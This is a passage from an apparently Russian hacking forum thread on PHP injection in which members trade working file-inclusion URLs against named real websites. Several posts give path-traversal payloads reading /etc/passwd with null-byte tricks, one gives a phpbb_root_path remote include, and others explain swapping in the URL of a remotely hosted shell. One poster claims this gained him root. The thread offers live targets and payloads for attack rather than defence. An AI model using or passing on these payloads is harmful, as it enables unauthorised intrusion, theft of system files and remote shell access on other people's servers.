PHP Injections

Discussion in 'Vulnerabilities' started by Joker-jar, 20 Apr 2007.

  1. ForWarD-Hack

    ForWarD-Hack New Member

    The admins are on fire.. :)) the root passwords in one of the databases are empty.. +)
     
    1 person likes this.
  2. ForWarD-Hack

    ForWarD-Hack New Member

    include ""; =)
     
    1 person likes this.
  3. ForWarD-Hack

    ForWarD-Hack New Member

    Windows ;)

    but if you want, it can be made remote ;)

    That's all for now... more coming soon.. I still have a lot of SQL injections :(
     
  4. Scipio

    Scipio Well-Known Member

    Everyone's favorite Dom-2, though only the WAP site so far...

    http://wap.dom2.ru/index.php?area=../../../../../../../../../etc/passwd%00

    or

    http://wap.dom2.ru:81/index.php?area=../../../../../../../../../etc/passwd%00
     
    3 people like this.
  5. Grey

    Grey Banned

    Code:
    http://www.33rus.ru/modules/Forums/admin/index.php?phpbb_root_path=[url]?
     
    #85 Grey, 22 May 2007
    Last edited: 22 May 2007
    2 people like this.
  6. NOmeR1

    NOmeR1 Everybody lies

    1.
     
    #86 NOmeR1, 23 May 2007
    Last edited: 23 May 2007
    3 people like this.
  7. Muhacir

    Muhacir Elder - Старейшина

    http://www.proteger.org.ar/download.php?file=[local]
     
  8. Scipio

    Scipio Well-Known Member

    Code:
    http://www.starcat-dev.de/display.php?file=24&lan=[сайт]
    In place of [сайт] ("site"), accordingly, goes the address of a site of the form http://site.narod.ru that hosts a shell named shortnews.txt

    P.S. By the way, thanks to this injection I got root, without using exploits and without cracking hashes
     
    1 person likes this.
  9. NOmeR1

    NOmeR1 Everybody lies

    These aren't includes, they're require_once, but there seems to be no difference..
    1.
     
    #89 NOmeR1, 28 May 2007
    Last edited: 28 May 2007
  10. NOmeR1

    NOmeR1 Everybody lies

    1.
    2.
     
    #90 NOmeR1, 29 May 2007
    Last edited: 29 May 2007
  11. SWAT

    SWAT Elder - Старейшина

    http://www.ssa.ro/domenii/index.php?main=../../../../../../../../etc/passwd

    http://www.host-power.de/html/index.php?main=
     
    #91 SWAT, 30 May 2007
    Last edited: 30 May 2007
  12. NOmeR1

    NOmeR1 Everybody lies

    1.
    2. Windows NT.
     
    #92 NOmeR1, 30 May 2007
    Last edited: 30 May 2007
  13. SWAT

    SWAT Elder - Старейшина

    http://simleyvolleyball.com/index.php?main=
     
  14. Scipio

    Scipio Well-Known Member

    A Brazilian gov site...

    Code:
    http://www.tre-to.gov.br/conteudo.php?pg=/etc/passwd
    Instead of... /etc/passwd you can try substituting a shell URL, but it didn't work for me, since it's Brazil and there's an ocean between us... as an option, you could try a shell from some Brazilian server (for beginners: the shell is better with an extension such as txt)...

    By the way... nice...
    Today 21:36, replies
    by Scipio: 100
     
    #94 Scipio, 30 May 2007
    Last edited: 30 May 2007
    1 person likes this.
  15. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    No idea what this site is =\

     
  16. NOmeR1

    NOmeR1 Everybody lies

    1.
    2.
     
    #96 NOmeR1, 1 Jun 2007
    Last edited: 1 Jun 2007
    3 people like this.
  17. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    =\\

     
  18. NOmeR1

    NOmeR1 Everybody lies

    1. Doesn't seem to have been posted before :)
     
    3 people like this.
  19. l1ght

    l1ght Elder - Старейшина

    =\
    Code:
    http://www.xx.inattack.ru/index.php?page=index.php%00
     
  20. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    =\\

     
    #100 ~!DoK_tOR!~, 5 Jun 2007
    Last edited: 6 Jun 2007
    1 person likes this.